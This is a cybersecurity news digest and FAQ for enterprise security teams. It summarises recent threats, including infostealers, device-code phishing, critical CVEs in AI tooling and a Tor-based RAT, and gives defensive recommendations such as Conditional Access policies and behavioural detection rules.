- Kaspersky: infostealers surged 59% globally, 1M+ banking accounts from the top 100 banks are circulating on the dark web, and 74% of compromised payment cards remain valid; phishing lures shifted from banks to Netflix, Apple and Spotify
  Source: EvilToken is phishing your M365 execs with dynamic device codes
- The IRGC published satellite coordinates of OpenAI's $30B Stargate data center in Abu Dhabi and threatened 'complete annihilation', the first known nation-state kinetic threat against AI infrastructure
  Source: Flowise CVSS 10.0 under active exploit + Iran targeting AI infrastructure
- Bot-driven fraud surged 59% in 2025, with North American desktop browser attacks more than doubling while mobile app attacks declined; your mobile-first fraud detection investment displaced risk rather than eliminating it
  Source: Bot fraud up 59% and shifting to your desktop browser
- HeyGen Avatar V builds photorealistic video deepfakes from a 15-second phone recording with identity/appearance separation; brief executive and finance teams and reinforce out-of-band verification for all wire transfers
  Source: Autonomous AI agents and hyper-realistic deepfakes just got easier
- DeepSeek V4: a 1-trillion-parameter model trained entirely on Huawei Ascend 950PR silicon, the first frontier model with zero NVIDIA dependency, showing US chip export controls have not prevented Chinese frontier AI development
  Source: Flowise CVSS 10.0 under active exploit + Iran targeting AI infrastructure
- 24K fake Claude accounts were used for industrial-scale model cloning; Anthropic, OpenAI and Google are now sharing threat intelligence cooperatively to block the campaign
  Source: Flowise CVSS 10.0 under active exploit + Iran targeting AI infrastructure
◆ Bottom line
The take.
Commodity AI agents, built from off-the-shelf models anyone can buy, just proved they can exploit 84% of CISA's Known Exploited Vulnerabilities in under an hour with zero human oversight. In the same week, a dozen critical, mostly unauthenticated vulnerabilities (CVSS 9.0–10.0) surfaced in the AI tools your teams deployed without telling you, China breached the FBI through a commercial ISP, and two new phishing and malware campaigns are exploiting M365 features you left enabled by default. The question is no longer whether your defenses are good enough; it's whether they operate at machine speed, because your adversaries now do.
Frequently asked
- How should defenders adapt when AI compresses exploit time to minutes?
- Shift from a 'patch before exploit' model to a 'contain during exploit' posture. Prioritize microsegmentation of identity, database, and CI/CD infrastructure, deploy automated host isolation and network quarantine playbooks, and accept higher false-positive tolerance — the cost of an unnecessary isolation is now far lower than the cost of a compromise that unfolds in under an hour.
- Which AI/ML tools carry the highest-severity vulnerabilities this week?
- FastGPT (CVE-2026-34162, CVSS 10.0) exposes an unauthenticated HTTP proxy; Claude Code CLI (CVE-2026-35022, 9.8) allows unauthenticated OS command injection; llama.cpp (CVE-2026-34159, 9.8) has unbounded deserialization RCE; LiteLLM (CVE-2026-35030, 9.1) allows auth bypass; Kestra (CVE-2026-34612, 9.9) has SQL injection to RCE; and PraisonAI has six critical CVEs rated 9.0–10.0. Most require no authentication.
- Why is the FBI's ISP-based breach relevant to private sector security teams?
- Because the same trust relationship exists with every commercial connectivity provider. Salt Typhoon pivoted from a commercial ISP into federal infrastructure, demonstrating that ISPs are a network-adjacent trust boundary with visibility into customer traffic. Any organization with dedicated circuits, MPLS, or co-location relationships inherits that pivot risk and should demand security attestations and segregate sensitive systems.
- What is the most effective immediate mitigation against EvilToken device code phishing?
- Create a Conditional Access policy in Entra ID that blocks device code authentication for all users except explicitly approved device registration scenarios. Device code flows are enabled by default in most tenants, and EvilToken's use of Railway.com to generate codes dynamically at click-time has eliminated the 15-minute expiration window that previously limited this attack.
- Why will signature-based detection miss the ClickFix RAT?
- The malware bundles its own Node.js runtime, routes all C2 through Tor, scans for 30+ security products before deploying payloads, and loads infostealer modules into memory only — never touching disk. Effective detection requires behavioral rules such as msiexec spawning Node.js children, Tor connections from non-browser processes, and Registry persistence under 'LogicOptimizer' paths.